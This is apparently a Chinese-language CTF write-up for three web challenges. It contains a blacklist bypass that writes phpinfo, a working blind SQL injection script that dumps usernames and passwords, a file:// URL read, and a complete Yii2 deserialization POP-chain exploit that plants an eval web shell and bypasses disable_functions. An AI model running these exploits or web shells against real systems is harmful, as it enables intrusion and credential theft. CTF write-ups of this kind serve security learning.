find_it
首页没发现东西,尝试robots.txt
发现 1ndexx.php
但无法访问 1ndexx.php
尝试继续找信息泄露,最后找到 .1ndexx.php.swp
<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}
#logo {
margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
意思叫我们写入内容入hack.php
,flag.php
也会写进去
尝试绕过,失败,忽然想起这是个变量,而phpinfo()
可以返回当前文件的所有变量
直接写<?=phpinfo()
,访问hack.php,搜索flag即可
WebsiteManger
最新的网站测试器,作为非站长的你,能利用好它的功能吗?
进来一个登录,网站测试器,应该是要进后台
发现疑似注入点
<img src="image.php?id=1" width="200" height="200">
加单引号直接报错,SQL注入进后台无异
测试了下,布尔和延时都可以
然后过滤一些东西,如and,空格,反引号
直接布尔跑脚本
import requests
url = "http://eci-2zeg1tmyhxfbufu01znt.cloudeci1.ichunqiu.com:80/image.php?id="
mark = 30000
payload = "2=(ascii(substr(database(),{0},1))<{1})"#ctf
payload = "2=(ascii(substr((select%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()),{0},1))<{1})"#images,users
payload = "2=(ascii(substr((select%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='users'),{0},1))<{1})" #username,password
payload = "2=(ascii(substr((select%09group_concat(username,password)%09from%09users),{0},1))<{1})"
headers={
'Cookie':'UM_distinctid=178e9516af74c6-0c5738c00c76bf-3f356b-144000-178e9516af8445; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1618822948,1618823059,1619657823,1620521956; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1620542590; __jsluid_h=7c39815c08aa1e1162ff727572d92e27',
}
def getResult():
flag=''
global payload
for i in range(1,50):
min=32
max=128
while True:
mid=min+(max-min)//2
if min == mid :
flag += chr(min)
print(flag)
break
r=requests.get(url+payload.format(i,mid),headers=headers)
print(url+payload.format(i,mid))
if mark>len(r.text):
max=mid
else :
min=mid
if (min+3==max) and (min==32):
return True
getResult()
拿用户名密码进后台
提示输入网站URL测试,想到伪协议
被坑了,最后在 host=file:///flag
读到flag,referer无用
framework
一道yii反序列化+disable_function
打开明显的yii2框架
这里猜测有源码,因为反序列化入口不知
直接 /www.zip
发现源码,直接拷贝下来本地运行
在首页 web/index.php
加一行 echo(Yii::getVersion());
查看出版本为2.0.32
找到反序列化入口点
public function actionAbout($message = 'Hello')
{
$data = base64_decode($message);
unserialize($data);
}
直接打流传最广的poc链
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'phpinfo';
$this->id = '5';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction, 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
?r=site%2Fabout&message=
发现有disable_function限制
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,mail,putenv,error_log,error_reporting,unset,unlink,return
一番尝试后发assert没被禁用,可以进行代码执行
改poc
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[1]);?>");die();';
蚁剑连上去,直接用disable_functions的Apache CGI插件秒杀
flag在 /readflag
中